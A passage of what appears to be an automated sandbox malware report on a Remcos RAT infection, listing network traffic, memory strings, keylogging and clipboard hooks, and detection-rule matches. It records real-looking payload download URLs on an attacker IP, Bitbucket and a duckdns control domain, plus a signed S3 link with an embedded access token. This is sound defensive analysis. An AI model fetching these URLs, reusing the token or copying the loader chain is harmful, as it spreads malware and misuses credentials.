8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 91.202.233.169 91.202.233.169
                  Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                  Source: Joe Sandbox ViewASN Name: M247GB M247GB
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49769 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.202.233.169Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004260F7 recv,15_2_004260F7
                  Source: global trafficHTTP traffic detected: GET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwglrM1o8LsYX0RovAU3W%2Bx4JB4pgdN4qsn1bW%2BfaD7XZjyLKF0JoYGK%2F0OwIw8v9GO6Ju75QefPFbX9xbLBwYMrmWW0lhQ%2B5mF%2BEx1g%3D%3D&Expires=1732092960 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.202.233.169Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                  Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                  Source: global trafficDNS traffic detected: DNS query: remcosnov24.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt
                  Source: powershell.exe, 00000007.00000002.1425303708.0000025F0E6E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.H
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                  Source: powershell.exe, 00000007.00000002.1515951705.0000025F28EB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.veris
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                  Source: powershell.exe, 00000002.00000002.1540300511.0000022615AE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1540300511.0000022615AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1540300511.0000022615A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazohj6
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                  Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                  Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000015_2_004099E4
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_00409B10
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041BB77 SystemParametersInfoW,15_2_0041BB77

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
